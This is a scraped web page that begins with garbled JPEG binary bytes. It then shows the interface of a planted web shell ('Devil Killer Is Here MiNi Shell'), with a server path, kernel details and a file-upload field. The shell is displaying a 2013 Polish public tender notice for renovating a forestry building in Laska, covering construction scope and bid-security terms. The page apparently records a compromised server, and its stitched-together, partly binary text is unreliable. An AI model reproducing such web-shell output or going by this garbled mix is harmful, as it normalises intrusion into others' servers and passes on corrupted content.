JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131115/465898-N-2013.html

<p class="kh_header"><b>Leśno: Przebudowa i remont istniejącego budynku administracyjno-mieszkalnego
 w miejscowości Laska, gm. Brusy</b><br>
<b>Numer ogłoszenia: 465898 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Przymuszewo , Przymuszewo 3, 89-634 Leśno, woj. pomorskie, tel. 52 5541919, faks 52 5541919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przymuszewo.torun.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa PGL Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i remont istniejącego budynku administracyjno-mieszkalnego
 w miejscowości Laska, gm. Brusy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego opracowania jest projekt budowlany przebudowy i remontu części istniejącego budynku administracyjno-mieszkalnego w miejscowości Laska, gmina Brusy.  
Projektowane rozwiązania architektoniczno-budowlane:
Istniejący stan zagospodarowania terenu i przewidywane zmiany.
Działka o nr ewid. 3051/6 jest własnością Skarbu Państwa w zarządzie Państwowego Gospodarstwa Leśnego Lasy Państwowe-Nadleśnictwo Przymuszewo. W chwili obecnej jest zabudowana, zagospodarowana zielenią ozdobną, częściowo utwardzona nawierzchnią z kostki betonowej oraz ogrodzona. Na jej terenie znajduje się budynek administracyjno-mieszkalny, dwa budynki gospodarcze oraz wiata.
Budynek administracyjno-mieszkalny, objęty niniejszym opracowaniem, znajduje się w centralnej części działki. Od strony północnej znajduje się utwardzony kostką betonową plac manewrowo-postojowy.
Nie planuje się zmian w zagospodarowaniu terenu działki. Budynek zostanie przebudowany w zakresie powiększenia sali konferencyjnej i jej zaplecza:
Zakres przebudowy :
- powiększenie sali konferencyjnej (w sali będą odbywać się konferencje i szkolenia do 30 osób)
- przeniesione i dostosowane do wymogów zostaną sanitariaty-wydzielenie wc męskiego i damskiego pełniącego rolę wc dla osoby niepełnosprawnej, zaprojektowanie wentylacji wc i łazienek.
- przeniesiona zostanie kuchnia i powstanie pomieszczenie gospodarcze dla sprzątaczki.
- częściowo wymienione będą stare instalacje (wodn.-kan, elektryczna i co.).
Zakres remontu:
- pogłębienie pomieszczenia kotłowni i składu opału aby osiągnąć wymaganą przepisami wysokość pomieszczenia (obecnie jest 203 cm a docelowo będzie 220 cm).
- wymiana pieca oraz osprzętu.
- wykonanie wentylacji pomieszczenia kotłowni.   
Rozwiązania budowlane.
Przebudowę zaprojektowano w technologii tradycyjnej:
- ściany piwnic - zamurowania będą wykonane z cegły budowlanej pełnej
- ściany wewnętrzne parteru murowane - j.w. o gr. 12 i 24 cm; (gazobeton)
- wentylacja grawitacyjna kanałami murowanymi z elementów prefabrykowanych; kanały z blachy
- klimatyzacja - klimatyzatory
- wykonanie podchwycenia ścian fundamentowych piwnicy - ściany podkopać etapowo naprzemiennie na gł.50 cm i szerokość równą grubości ściany, wykonać izolację poziomą z papy 2x, zabetonować wykopany odcinek betonem B-20. Wykopy wykonać naprzemiennie na max. 150 cm długości ściany. Po podbetonowaniu ścian fundamentowych można przystąpić do pogłębienia piwnic.
 Uwaga: zakres robót betonowych podłoży  określony zostanie po rozbiórce posadzek - glazury i paneli.
  Wykończenia wewnętrzne:
- glazura - w kuchniach i łazienkach okładzina z płytek ceramicznych wg wskazań inwestora do wysokości minimum 2 m,
 - malowanie ścian - farbami emulsyjnymi,
 - parapety - gotowe wykonane z płyt POSFORMING dostarczane wraz z oknami, kamienne, PCV - wg wskazań inwestora.
Stolarka okienna i drzwiowa:
 - okna - istniejące okno po demontażu będzie wstawione w innym miejscu ,
 - drzwi zewnętrzne - przeszklone drewniane, antywłamaniowe,
 - drzwi wewnętrzne - drewniane, płycinowe, pełne lub przeszklone
 - drzwi wewnętrzne, do pomieszczenia kotłowni i składu opału - stalowe, pełne, EI60.
Ilości i typy oraz rodzaje skrzydeł i ich wygląd zewnętrzny według części rysunkowej oraz zestawień stolarki okiennej i drzwiowej. Wykończenia zewnętrzne:
 - elewacje - przemalowanie ściany w której będą osadzone nowe drzwi i okna,
 - podokienniki - gotowe, z blachy powlekanej,
Instalacja elektryczna, RTV, komputerowa, wentylacji i klimatyzacji
Projekt budowlany na wewnętrzną instalację elektryczną w/w obiektu
obejmuje:
- wewnętrzne linie zasilające i rozdział energii
- instalację elektryczną oświetlenia podstawowego
- instalację elektryczną gniazd wtykowych 230V i siłową 400V
- instalację RTV i komputerową
- instalację elektryczną do wentylacji i klimatyzacji
- ochronę przeciwporażeniową i połączenia wyrównawcze
- ochronę przepięciową obiektu
- uwagi końcowe
1. Rozdział energii elektrycznej i wewnętrzne linie zasilające
Przebudowę i remont istniejącego budynku administracyjno-mieszkalnego należy
zasilić z projektowanej rozdzielni głównej R1. 
 Rozdzielnie wykonać zgodnie z normą PN-EN60439-3pt. Wymagania dotyczące niskonapięciowych rozdzielnic przeznaczonych do instalowania w miejscach dostępnych do użytkowania przez osoby
niewykwalifikowane.
2. Instalacja oświetlenia podstawowego
3. Instalacja gniazd wtykowych 230 V i 400V
4. Instalacja RTV i nagłośnienia
Projektuje się instalację telewizyjną z istniejącej szafki krosowej do gniazd
RTV na Sali konferencyjnej i pokoju służbowym po 2szt..
Nagłośnienie na potrzeby prezentacji multimedialnych w Sali konferencyjnej
zrealizować przy pomocy zestawu audio 2+1 150W(subowoofer). 
5. Instalacja strukturalna (sieć komputerowa)
Projektuje się instalację strukturalną z szafki krosowej teleinformatycznej
Po wykonaniu instalacji okablowania strukturalnego wykonawca musi
przeprowadzić odpowiednie testy i pomiary poświadczające, że okablowanie
poziome spełnia standardy kategorii 6/Klasy E, zgodnie z wymogami zawartymi
w normach i ewentualne inne wymagania konieczne do wystawienia certyfikatu
gwarancyjnego przez producenta okablowania. Należy sprawdzić zgodność
struktury okablowania z wymaganiami norm w tym zakresie. Łącznie z pomiarami
należy dostarczyć certyfikat potwierdzający ważną kalibrację przyrządu
pomiarowego.
6. Instalacja elektryczna do klimatyzacji i wentylacji
Wentylację i klimatyzację wykonać w oparciu o dokumentację techniczno-ruchową
DTR dla zastosowanych typów urządzeń.
7. System ochrony od porażeń
Jako system ochrony od porażeń zastosować samoczynne wyłączanie.
Dla rozdzielni RG obowiązuje system sieci TN-C-S, a całą instalację odbiorczą
wykonać w układzie TN-S..
Sprawdzić ciągłość przewodów ochronnych PE i skuteczność ochrony od porażeń.
Ponadto w rozdzielni zastosowano wyłączniki przeciwporażeniowe typu AC i A
o prądzie zadziałania DI = 30mA dla ochrony przed dotykiem pośrednim.
8. Ochrona przepięciowa
Należy zastosować układ ochronny przed przepięciami w oparciu o urządzenia
klasy B+C.
9. Ochrona przeciwpożarowa
Dla ochrony przed pożarem od instalacji elektrycznej zastosowano
- przycisk na zewnątrz obiektu jako główny wyłącznik przeciwpożarowy
prądu
- wyłączniki różnicowo-prądowe DI= 30mA na poszczególnych obwodach
odpływowych
- zabezpieczenie zwarciowe oraz przeciążeniowe instalacji
- przewody o wytrzymałości 750 V
UWAGA: Inwestor zakupi i dostarczy wszystkie oprawy oświetleniowe.
Wewnętrzna instalacja wody zimnej, ciepłej użytkowej,
cyrkulacji, instalacji kanalizacji sanitarnej, centralnego ogrzewania oraz
wentylacji mechanicznej
 1. Instalacja wodociągowa
Zasilanie budynku w wodę odbywać się będzie poprzez istniejące przyłącze
wodociągowe. Przed rozpoczęciem robót wykonawczych wewnętrznej instalacji
wodociągowej w części objętej opracowaniem należy odszukać dokładne miejsce
włączenia się do istniejącej wewnętrznej instalacji wodociągowej.
Demontażowi ulegnie cała istniejąca wewnętrzna instalacja wodociągowa w części
objętej opracowaniem.
Projektuje się nową wewnętrzną instalację wodociągową z rur miedzianych
instalacyjnych twardych posiadających oznaczenie F37 znakowane cechami normy
niemieckiej gat. SF-Cu DIN 1786, 1787. Rury miedziane winny być dopuszczone do stosowania w budownictwie na podstawie decyzji COBRTI INSTAL oraz posiadać
ocenę higieniczną PZH. Zastosowano łączniki i kształtki miedziane do lutowania
kapilarnego np. WOESTE, YORKSHIRE lub inne. Łączniki do rur miedzianych
winny spełniać te same wymagania materiałowe co rury. Lutowanie złącz rur i kształtek
miedzianych należy wykonać metodą kapilarnego połączenia kielichowego przy pomocy lutu miękkiego. 
3. Wodomierz.
Projektuje się wymianę istniejącego wodomierza na nowy. Główny zestaw
wodomierzowy zostanie umieszczony w pomieszczeniu pomocniczym zgodnie 
z Rozporządzeniem Ministra Infrastruktury Nr 75/690.
Wodomierz należy zabezpieczyć przed dostępem osób
postronnych i przed zamarznięciem.
4. Instalacja ciepłej wody użytkowej i cyrkulacji.
Ciepła woda dla potrzeb bytowo - gospodarczych będzie poprzez projektowany
podgrzewacz c.w.u. o poj. 160 l, w kotłowni na paliwo stałe, zlokalizowanej w piwnicy
budynku.
Rozprowadzenie przewodów ciepłej wody i cyrkulacji dla budynku należy poprowadzić
równolegle do przewodów wody zimnej. Instalację ciepłej wody i cyrkulacji dla
budynku wykonać należy z rur miedzianych łączonych przy pomocy lutu miękkiego
zachowując warunki wykonania jak instalacji wody zimnej. 
Montaż rur zgodnie z wytycznymi producentów.
Wszystkie połączenia rur powinny być odkryte podczas próby dla umożliwienia ujawnienia ewentualnych przecieków. Sprawdzanie przewodów przed oddaniem do eksploatacji wykonać wg normy i z wytycznymi producenta.
Projektuje się instalację cyrkulacyjną z rur miedzianych.
5.  Próby i płukanie.
Po wykonaniu montażu instalacji sanitarnej, a przed zakryciem instalacji w posadzkach, bruzdach ściennych lub innych miejscach, należy wykonać próbę szczelności. Próbę szczelności instalacji wykonać wodą zimną zgodnie z Wytycznymi Wykonania i Odbioru Instalacji Wodociągowych wydanych przez COBRTI INSTAL (07-2003).
INSTALACJA KANALIZACYJNA
Ścieki sanitarne z budynku będą odprowadzane do istniejącej wewnętrznej instalacji
kanalizacji sanitarnej.
Przed rozpoczęciem robót wykonawczych wewnętrznej instalacji kanalizacji sanitarnej
w części objętej opracowaniem należy odszukać dokładne miejsce włączenia się 
do istniejącej wewnętrznej instalacji kanalizacji sanitarnej.
Demontażowi ulegnie cała wewnętrzna instalacja kanalizacji sanitarnej w części objętej opracowaniem.
Instalację kanalizacyjną prowadzoną powyżej posadzki wykonać z rur kielichowych
z PVC dla kanalizacji wewnętrznej łączonych na uszczelki, natomiast instalację
prowadzoną pod posadzką wykonać z rur kielichowych PVC dla kanalizacji
zewnętrznej łączonych na uszczelki.
Wykonawca zobowiązany jest do zapoznania się z projektem technicznym innych
branż. Istniejące kolizje z podciągami i innymi elementami konstrukcyjnymi należy
rozwiązać na budowie.
Po zakończeniu robót montażowych instalacji kanalizacyjnej przeprowadzić badanie
szczelności. Podejścia i przewody spustowe (piony) sprawdzić na szczelność w czasie
swobodnego przepływu przez nie wody. Przewody odpływowe (poziomy) napełnić
wodą powyżej kolana łączącego pion z poziomem, sprawdzić poprzez oględziny.
INSTALACJA CENTRALNEGO OGRZEWANIA
Instalacja centralnego ogrzewania ma pokryć i rozprowadzić ciepło na potrzeby
ogrzania budynku i wentylacji. W budynku istnieje instalacja centralnego ogrzewania.
Demontażowi ulegnie cała wewnętrzna instalacja centralnego ogrzewania w części
objętej opracowaniem. Projektowaną instalację c.o. w części objętej opracowaniem oraz istniejącą instalację c.o. w części nieobjętej opracowaniem należy połączyć 
z nowoprojektowaną kotłownią na paliwo stałe.
Instalację centralnego ogrzewania zaprojektowano w układzie poziomym, dwururowym
o parametrach wody grzejnej 70/50°C. Źródłem ciepła będzie projektowany kocioł 
na paliwo stałe na (eko-groszek) o mocy 48 kW.
Przewody c.o. dla ogrzewania grzejnikowego zaprojektowano miedziane instalacyjne
twarde posiadające oznaczenie R290, zgodnie z normą PN-EN-1057:1999. Rury winny
być dopuszczone do stosowania w budownictwie na podstawie decyzji COBRTI
INSTAL. 
Przewody należy mocować do konstrukcji budowlanych. Przed montażem przewodów
należy zapoznać się również z wytycznymi zamieszczonymi w katalogu producenta.
Instalację centralnego ogrzewania należy wyregulować hydraulicznie.
Na obiegach grzewczych wyprowadzonych z rozdzielaczy należy zamontować
niezbędne urządzenia oraz armaturę kontrolno - pomiarową.
W budynku zaprojektowano grzejniki płytowe stalowe typu Cosmo zaworowe firmy
VNH z podłączeniem dolnym i łazienkowe typu Wave firmy VNH. Należy je montować wg wytycznych producenta. 
1. Instalacja centralnego ogrzewania w pomieszczeniu kotłowni.
Instalację w pomieszczeniu kotłowni wykonać z rur miedzianych instalacyjnych
twardych posiadających oznaczenie R290, zgodnie z normą PN-EN-1057:1999. Rury
winny być dopuszczone do stosowania w budownictwie na podstawie decyzji COBRTI
INSTAL.
2. Pomieszczenie kotła.
Kocioł będzie stać w pomieszczeniu kotłowni w piwnicy budynku, wyposażonym
wentylację wywiewną i nawiewną, instalacje wody i kanalizacji. Paliwo będzie
składowane wewnątrz budynku w pomieszczaniu opału.
3. Kocioł grzewczy.
Dla instalacji centralnego ogrzewania zaprojektowano kocioł na paliwo stałe o mocy 48 kW. Kocioł powinien być instalowany w pomieszczeniu spełniającym wymagania
odpowiednich przepisów budowlanych. Ustawienie kotła powinno zapewnić dogodną
obsługę i czyszczenie. Montaż, próby uruchomienia kotła oraz usuwanie usterek - należy powierzyć uprawnionym osobom. Nie dopuszcza się wykonania połączenia kotła z instalacją c.o. przy pomocy spawania.
4. Komin i czopuch.
Montaż komina zgodnie z zaleceniami producenta, który wykonać zgodnie 
z dokumentacją budowlaną. U podstawy komina zamontować wyczystkę z drzwiami.
Czopuch wykonać z elementów stalowych, na załamaniach wykonać rewizje. Czopuch
zaizolować cieplnie za pomocą wełny mineralnej.
5. Armatura instalacji centralnego ogrzewania.
W instalacji zaprojektowano armaturę:
- głowice termostatyczne,
- zawory przelotowe, kulowe wykonane ze stali stopowej, czterodrogowe, dopełniające,
- zawory zwrotne, antyskażeniowe,
- filtry i zawory spustowe.
Nie należy stosować armatury ze stali ocynkowanej i żeliwa.
W pomieszczeniu technicznym zaprojektowano armaturę kołnierzową i gwintową
odcinającą, która może pracować w temp. 150oC i ciś. do 2,5 Mpa.
6. Naczynie wzbiorcze.
Zabezpieczenie instalacji i kotła należy wykonać zgodnie z normą PN-91/B-02413.
Przyjęto naczynie wzbiorcze systemu otwartego o pojemności 50l.
Naczynie wzbiorcze, rury bezpieczeństwa, rura wzbiorcza, sygnalizacyjna i przelewowa powinny być umieszczone w przestrzeni, w której temperatura powietrza jest wyższa niż 0°C. Jeśli naczynie i rury będą zamontowane w pomieszczeniu poniżej tej temperatury naczynie i rury należy zabezpieczyć odpowiednio przed zamarznięciem.
7. Odpowietrzenie projektowanej instalacji centralnego ogrzewania.
Odpowietrzenie instalacji odbywa się będzie poprzez wbudowane w grzejniki zawory
odpowietrzające uruchamiane ręcznie oraz automatyczne odpowietrzniki na pionach
centralnego ogrzewania poprzedzone zaworkami odcinającymi.
8. Próby i płukanie instalacji centralnego ogrzewania.
9. Napełnianie i opróżnianie instalacji centralnego ogrzewania.
10. Wymagania dla wody do napełniania instalacji grzewczej.
11. Wentylacja pomieszczenia kotłowni.
12. Ochrona przeciwpożarowa.
Należy oznakować zgodnie z Polskimi Normami miejsca usytuowań urządzeń p.poż.,
przeciwpożarowych wyłączników prądu. W przypadku powstania pożaru należy
bezzwłocznie zatrzymać pracę urządzeń elektrycznych.
13. Uwagi końcowe dla pomieszczenia kotłowni.
Do kotłowni doprowadzić wodę, nad zlewem zakończyć zaworem z końcówką do węża. W pomieszczeniu kotłowni należy przewidzieć jedno gniazdko wtykowe o napięciu 220 V i 24 V.
Całość prac wykonać zgodnie z przepisami BHP, obowiązującymi normami,
instrukcjami montażu wydanymi przez producentów użytych urządzeń i materiałów
oraz: (Warunkami technicznymi wykonania i odbioru robót budowlano montażowych.
Tom II. Instalacje sanitarne i przemysłowe).
INSTALACJA WENTYLACJI MECHANICZNEJ
Projektowana wentylacja mechaniczna ma zapewnić dostarczenie powietrza o
wymaganych parametrach do poszczególnych pomieszczeń w budynku.
1. Toalety i wc.
2. Sala konferencyjna.
Do chłodzenia sali konferencyjnej zaprojektowano układ klimatyzacji produkcji
Mitsubishi Electric.
POZOSTAŁE USTALENIA
Teren działki nie podlega ochronie konserwatorskiej i nie znajduje się w rejonie wpływu eksploatacji górniczej.
Projekt wykonany został w oparciu o szczegółowe wytyczne Inwestora, inwentaryzację budynku wykonaną w zakresie niniejszego opracowania, wizję lokalną połączoną z pomiarami obiektu. Planowana inwestycja została zaprojektowana zgodnie z obowiązującymi przepisami związanymi z ochroną środowiska oraz z przepisami techniczno-budowlanymi.
Projektowana przebudowa budynku administracyjno-mieszkalnego nie wymaga ustalenia stref ochrony sanitarnej i nie wpływa negatywnie na środowisko przyrodnicze oraz nie narusza praw osób trzecich, wynikających z jej usytuowania oraz projektowanej funkcji.
Szczegółowe wymagania dotyczące wykonania i odbioru robót zawierają Specyfikacje Techniczne stanowiące załącznik do niniejszej SIWZ.
Dodatkowe warunki dotyczące przedmiotu zamówienia:
Warunki środowiskowe do uwzględnienia przez Wykonawcę w trakcie  realizacji przedsięwzięcia:
1. Należy stosować sprawny technicznie sprzęt budowlany zabezpieczony
przed możliwością ewentualnych wycieków substancji niebezpiecznych do gruntu; 
2. W razie awarii należy zabezpieczyć grunt przed zanieczyszczeniem substancjami niebezpiecznymi pochodzącymi z uszkodzonych maszyn;
3. Plac budowy powinien być organizowany w taki sposób, aby nie powodował zanieczyszczeń  lub uszkodzeń roślinności i siedlisk na obszarach chronionych;
4. W fazie budowy prace wymagające użycia urządzeń, które emitują ponadnormatywny poziom hałasu prowadzić wyłącznie w porze dziennej;
5. Zaplecze budowlane oraz miejsce tymczasowego gromadzenia odpadów na terenach leśnych należy zlokalizować w granicach istniejących dróg;
6. Po zakończeniu prac teren należy uporządkować.
Szczegółowy zakres prac określają załączniki do Specyfikacji Istotnych Warunków Zamówienia (SIWZ), projekty techniczne, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót.
Wszystkie roboty muszą być wykonane zgodnie z obowiązującymi przepisami, 
w szczególności z wymogami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz.U. z 2010r. nr 243 poz. 1623 z poź. zm.) normami, warunkami technicznymi  i sztuką budowlaną , przepisami dotyczącymi bhp  przy wykonywaniu robót budowlanych Rozporządzenie Ministra Infrastruktury z dnia 6 lutego 2003r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót (Dz. U. 2003 nr 47 poz. 401), przepisami ppoż oraz zgodnie z poleceniami inspektora nadzoru..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza udzielenie zamówień uzupełniających stanowiących nie więcej niż 30% wartości zamówienia podstawowego, w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacja na temat wadium: 
1.Zamawiający żąda wniesienia wadium w wysokości: 
 12 000,00 zł słownie: dwanaście tysięcy zł 
2.Wadium należy wnieść w terminie do dnia: 29.11.2013r. do godz. 10:00. 
3.Wadium może być wnoszone w jednej lub kilku następujących formach: 
a. pieniądzu: przelewem na rachunek bankowy Zamawiającego: BGŻ Tuchola 54 2030 0045 1110 0000 0105 3620 z dopiskiem (Przebudowa i remont istniejącego budynku administracyjno-mieszkalnego w miejscowości Laska, gm. Brusy)
w takim terminie, aby pieniądze znajdowały się na koncie Zamawiającego najpóźniej w dniu otwarcia ofert tj. do 29.11.2013r. do godz. 10:00. 
O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie decyduje data wpływu na rachunek Zamawiającego; 
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c. gwarancjach bankowych; 
d. gwarancjach ubezpieczeniowych;
e. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
4. Poręczenie lub gwarancja muszą być bezwarunkowe, płatne na pierwsze wezwanie Zamawiającego oraz winny obejmować wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i 5 ustawy, a także obejmować cały okres związania ofertą określony w pkt 10 niniejszej SIWZ. 
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą. 
7. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z 
późn. zm.). 
8. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
9. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. 
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
